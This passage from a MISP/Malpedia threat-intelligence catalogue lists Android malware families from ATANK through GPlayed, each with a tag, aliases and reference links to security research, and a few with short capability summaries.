https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/

ATANK

According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018. IT can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.

The tag is: misp-galaxy:malpedia="ATANK"

ATANK is also known as:

Table 807. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank
https://twitter.com/LukasStefanko/status/1268070798293708800

BADCALL (Android)

The tag is: misp-galaxy:malpedia="BADCALL (Android)"

BADCALL (Android) is also known as:

Table 808. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall
https://www.us-cert.gov/ncas/analysis-reports/ar19-252a

BadPatch

The tag is: misp-galaxy:malpedia="BadPatch"

BadPatch is also known as:

WelcomeChat

Table 809. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch
https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/

Bahamut (Android)

The tag is: misp-galaxy:malpedia="Bahamut (Android)"

Bahamut (Android) is also known as:

Table 810. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut
https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf
https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/
https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/

Basbanke

The tag is: misp-galaxy:malpedia="Basbanke"

Basbanke is also known as:

Table 811. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke
https://twitter.com/LukasStefanko/status/1280243673100402690
https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/.YHTDZS2tEUE[https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/.YHTDZS2tEUE]
https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/

BianLian

The tag is: misp-galaxy:malpedia="BianLian"

BianLian is also known as:

Table 812. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian
https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html
https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html

BlackRock

The tag is: misp-galaxy:malpedia="BlackRock"

BlackRock is also known as:

Table 813. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.blackrock
https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html
https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html

BRATA

The tag is: misp-galaxy:malpedia="BRATA"

BRATA is also known as:

Table 814. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata
https://securelist.com/spying-android-rat-from-brazil-brata/92775/

BusyGasper

The tag is: misp-galaxy:malpedia="BusyGasper"

BusyGasper is also known as:

Table 815. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper
https://securelist.com/busygasper-the-unfriendly-spy/87627/

CarbonSteal

The tag is: misp-galaxy:malpedia="CarbonSteal"

CarbonSteal is also known as:

Table 816. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

Catelites

Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.

The tag is: misp-galaxy:malpedia="Catelites"

Catelites is also known as:

Table 817. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites
https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang
https://www.youtube.com/watch?v=1LOy0ZyjEOk

Cerberus

The tag is: misp-galaxy:malpedia="Cerberus"

Cerberus is also known as:

Table 818. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus
https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html
https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html
https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/
https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/
https://community.riskiq.com/article/85b3db8c
https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/
https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus
https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf
https://github.com/ics-iot-bootcamp/cerberus_research
https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html
https://nur.pub/cerberus-analysis
https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf
https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html
https://www.threatfabric.com/blogs/2020_year_of_the_rat.html
https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://twitter.com/AndroidCerberus

Chamois

The tag is: misp-galaxy:malpedia="Chamois"

Chamois is also known as:

Table 819. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.chamois
https://github.com/maddiestone/ConPresentations/blob/master/KasperskySAS2019.Chamois.pdf
https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html
https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-unpacking-packed-unpacker-reversing-android-anti-analysis-native-library/

Charger

The tag is: misp-galaxy:malpedia="Charger"

Charger is also known as:

Table 820. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger
http://blog.checkpoint.com/2017/01/24/charger-malware/
http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html
https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf

Chrysaor

The tag is: misp-galaxy:malpedia="Chrysaor"

Chrysaor is also known as:

JigglyPuff
Pegasus

Table 821. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor
https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests
https://thewire.in/tag/pegasus-project
https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/
https://twitter.com/HackSysTeam/status/1418223814387765258?s=20
https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/
https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html
https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus
https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/
https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus
https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/
https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/
https://forbiddenstories.org/about-the-pegasus-project/
https://www.theguardian.com/news/series/pegasus-project
https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html
https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat
https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/
https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/
https://twitter.com/alexanderjaeger/status/1417447732030189569
https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto
https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/
https://twitter.com/billmarczak/status/1416801439402262529
https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/
https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure
https://citizenlab.ca/2021/07/amnesty-peer-review/
https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5
https://media.ccc.de/v/33c3-7901-pegasus_internals
https://thewire.in/media/pegasus-project-spyware-indian-journalists
https://zetter.substack.com/p/pegasus-spyware-how-it-works-and
https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/
https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/
https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html
https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/
https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/
https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html
https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying
https://nex.sx/blog/2021/08/03/the-pegasus-project.html
https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/
https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso
https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages
https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/
https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/
https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html
https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf
https://objective-see.com/blog/blog_0x67.html

Clientor

The tag is: misp-galaxy:malpedia="Clientor"

Clientor is also known as:

Table 822. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor
https://twitter.com/LukasStefanko/status/1042297855602503681

Clipper

The tag is: misp-galaxy:malpedia="Clipper"

Clipper is also known as:

Table 823. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.clipper
https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html
https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/
https://news.drweb.com/show?lng=en&i=12739

CloudAtlas

The tag is: misp-galaxy:malpedia="CloudAtlas"

CloudAtlas is also known as:

Table 824. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.cloudatlas
https://web.archive.org/web/20160710180729/https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-inception-framework%E2%80%9D-very-sophisticated-layered-malware

CometBot

The tag is: misp-galaxy:malpedia="CometBot"

CometBot is also known as:

Table 825. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot
https://twitter.com/LukasStefanko/status/1102937833071935491

Connic

The tag is: misp-galaxy:malpedia="Connic"

Connic is also known as:

SpyBanker

Table 826. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic
https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/

Coper

The malicious Coper apps have a modular architecture and a multi-stage infection mechanism. All known Coper banker trojan modifications target Colombian users to date. However, new versions targeting users from other countries are likely to emerge over time.

The tag is: misp-galaxy:malpedia="Coper"

Coper is also known as:

Table 827. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper
https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0

Coronavirus Android Worm

Poses as an app that can offer a "corona safety mask" but phone’s address book and sends sms to contacts, spreading its own download link.

The tag is: misp-galaxy:malpedia="Coronavirus Android Worm"

Coronavirus Android Worm is also known as:

Table 828. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.corona_worm
https://dissectingmalwa.re/jamba-superdeal-helo-sir-you-want-to-buy-mask-corona-safety-mask-sms-scam.html
https://www.zscaler.com/blogs/research/new-android-app-offers-coronavirus-safety-mask-delivers-sms-trojan

Cpuminer (Android)

The tag is: misp-galaxy:malpedia="Cpuminer (Android)"

Cpuminer (Android) is also known as:

Table 829. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer
https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/

CryCryptor

The tag is: misp-galaxy:malpedia="CryCryptor"

CryCryptor is also known as:

CryCrypter
CryDroid

Table 830. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor
https://www.welivesecurity.com/2020/06/24/new-ransomware-uses-covid19-tracing-guise-target-canada-eset-decryptor/

Dark Shades

The tag is: misp-galaxy:malpedia="Dark Shades"

Dark Shades is also known as:

Rogue

Table 831. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades
https://twitter.com/LukasStefanko/status/1252163657036976129

DEFENSOR ID

The tag is: misp-galaxy:malpedia="DEFENSOR ID"

DEFENSOR ID is also known as:

Defensor Digital

Table 832. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/

Dendroid

The tag is: misp-galaxy:malpedia="Dendroid"

Dendroid is also known as:

Table 833. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

dmsSpy

The tag is: misp-galaxy:malpedia="dmsSpy"

dmsSpy is also known as:

Table 834. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy
https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/
https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf

DoubleAgent

The tag is: misp-galaxy:malpedia="DoubleAgent"

DoubleAgent is also known as:

Table 835. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

DoubleLocker

The tag is: misp-galaxy:malpedia="DoubleLocker"

DoubleLocker is also known as:

Table 836. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker
https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/

DroidJack

The tag is: misp-galaxy:malpedia="DroidJack"

DroidJack is also known as:

Table 837. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack
https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic

DualToy (Android)

The tag is: misp-galaxy:malpedia="DualToy (Android)"

DualToy (Android) is also known as:

Table 838. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy
http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/

Dvmap

The tag is: misp-galaxy:malpedia="Dvmap"

Dvmap is also known as:

Table 839. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap
https://securelist.com/mobile-malware-evolution-2019/96280/
https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/

Elibomi

The tag is: misp-galaxy:malpedia="Elibomi"

Elibomi is also known as:

Drinik

Table 840. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.elibomi
https://blog.cyble.com/2021/09/07/fake-income-tax-application-targets-indian-taxpayers/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-android-malware-targets-taxpayers-in-india/

ERMAC

The tag is: misp-galaxy:malpedia="ERMAC"

ERMAC is also known as:

Table 841. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac
https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html

Eventbot

According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.

The tag is: misp-galaxy:malpedia="Eventbot"

Eventbot is also known as:

Table 842. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot
https://twitter.com/ThreatFabric/status/1240664876558823424
https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born
https://www.youtube.com/watch?v=qqwOrLR2rgU

ExoBot

The tag is: misp-galaxy:malpedia="ExoBot"

ExoBot is also known as:

Table 843. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot
https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/

Exodus

The tag is: misp-galaxy:malpedia="Exodus"

Exodus is also known as:

Table 844. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus
https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv
https://securitywithoutborders.org/blog/2019/03/29/exodus.html
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store

FakeAdBlocker

The tag is: misp-galaxy:malpedia="FakeAdBlocker"

FakeAdBlocker is also known as:

Table 845. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakeadblocker
https://www.welivesecurity.com/2021/07/20/url-shortener-services-android-malware-banking-sms-trojans/

FakeSpy

The tag is: misp-galaxy:malpedia="FakeSpy"

FakeSpy is also known as:

Table 846. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy
https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html
https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html
https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/
https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/
https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681

FakeGram

The tag is: misp-galaxy:malpedia="FakeGram"

FakeGram is also known as:

FakeTGram

Table 847. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram
https://blog.talosintelligence.com/2018/11/persian-stalker.html

FileCoder

The tag is: misp-galaxy:malpedia="FileCoder"

FileCoder is also known as:

Table 848. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder
https://www.welivesecurity.com/2019/07/29/android-ransomware-back/

FinFisher (Android)

The tag is: misp-galaxy:malpedia="FinFisher (Android)"

FinFisher (Android) is also known as:

Table 849. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher
https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/
https://securelist.com/finspy-unseen-findings/104322/
https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/
https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/
https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf
https://github.com/linuzifer/FinSpy-Dokumentation

FlexiSpy (Android)

The tag is: misp-galaxy:malpedia="FlexiSpy (Android)"

FlexiSpy (Android) is also known as:

Table 850. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy
https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/
https://mobisec.reyammer.io/slides

FlexNet

The tag is: misp-galaxy:malpedia="FlexNet"

FlexNet is also known as:

gugi

Table 851. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet
https://securelist.com/mobile-malware-evolution-2019/96280/
https://twitter.com/LukasStefanko/status/886849558143279104

FluBot

PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it’s C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.

The tag is: misp-galaxy:malpedia="FluBot"

FluBot is also known as:

Cabassous
FakeChat

Table 852. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot
https://mobile.twitter.com/albertosegura/status/1400396365759500289[https://mobile.twitter.com/albertosegura/status/1400396365759500289]
https://twitter.com/albertosegura/status/1399249798063087621?s=20[https://twitter.com/albertosegura/status/1399249798063087621?s=20]
https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon
https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368
https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06
https://twitter.com/albertosegura/status/1402615237296148483[https://twitter.com/albertosegura/status/1402615237296148483]
https://twitter.com/malwrhunterteam/status/1359939300238983172
https://twitter.com/albertosegura/status/1384840011892285440[https://twitter.com/albertosegura/status/1384840011892285440]
https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027
https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/
https://securityintelligence.com/posts/story-of-fakechat-malware/
https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html
https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9
https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/
https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users
https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html
https://blog.zimperium.com/flubot-vs-zimperium/
https://hispasec.com/resources/FedexBanker.pdf
https://twitter.com/albertosegura/status/1395675479194095618[https://twitter.com/albertosegura/status/1395675479194095618]
https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf
https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/
https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/
https://therecord.media/flubot-malware-gang-arrested-in-barcelona/
https://twitter.com/albertosegura/status/1404098461440659459[https://twitter.com/albertosegura/status/1404098461440659459]
https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/

FlyTrap

Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading.

The tag is: misp-galaxy:malpedia="FlyTrap"

FlyTrap is also known as:

Table 853. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.flytrap
https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/

FunkyBot

The tag is: misp-galaxy:malpedia="FunkyBot"

FunkyBot is also known as:

Table 854. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot
https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html
https://securelist.com/roaming-mantis-part-v/96250/
https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681

FurBall

According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.

The tag is: misp-galaxy:malpedia="FurBall"

FurBall is also known as:

Table 855. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball
https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html
https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/
https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program
https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf
https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/
https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/

Geost

The tag is: misp-galaxy:malpedia="Geost"

Geost is also known as:

Table 856. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost
https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/
https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/

Ghimob

The tag is: misp-galaxy:malpedia="Ghimob"

Ghimob is also known as:

Table 857. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob
https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/

GhostCtrl

The tag is: misp-galaxy:malpedia="GhostCtrl"

GhostCtrl is also known as:

Table 858. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl
https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/

Ginp

Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:

Overlaying: Dynamic (local overlays obtained from the C2) SMS harvesting: SMS listing SMS harvesting: SMS forwarding Contact list collection Application listing Overlaying: Targets list update SMS: Sending Calls: Call forwarding C2 Resilience: Auxiliary C2 list Self-protection: Hiding the App icon Self-protection: Preventing removal Self-protection: Emulation-detection.

The tag is: misp-galaxy:malpedia="Ginp"

Ginp is also known as:

Table 859. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp
https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html
https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/
https://www.youtube.com/watch?v=WeL_xSryj8E
https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/
https://twitter.com/ESETresearch/status/1269945115738542080
https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

GlanceLove

The tag is: misp-galaxy:malpedia="GlanceLove"

GlanceLove is also known as:

Table 860. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove
https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773
https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/
https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/
https://www.clearskysec.com/glancelove/

GnatSpy

The tag is: misp-galaxy:malpedia="GnatSpy"

GnatSpy is also known as:

Table 861. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.gnatspy
https://www.trendmicro.com/en_us/research/17/l/new-gnatspy-mobile-malware-family-discovered.html

GoldenEagle

The tag is: misp-galaxy:malpedia="GoldenEagle"

GoldenEagle is also known as:

Table 862. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle
https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

GoldenRAT

The tag is: misp-galaxy:malpedia="GoldenRAT"

GoldenRAT is also known as:

Table 863. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldenrat
https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/

goontact

The tag is: misp-galaxy:malpedia="goontact"

goontact is also known as:

Table 864. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact
https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail
https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/

GPlayed

Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.

The tag is: misp-galaxy:malpedia="GPlayed"

GPlayed is also known as:

Table 865. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed
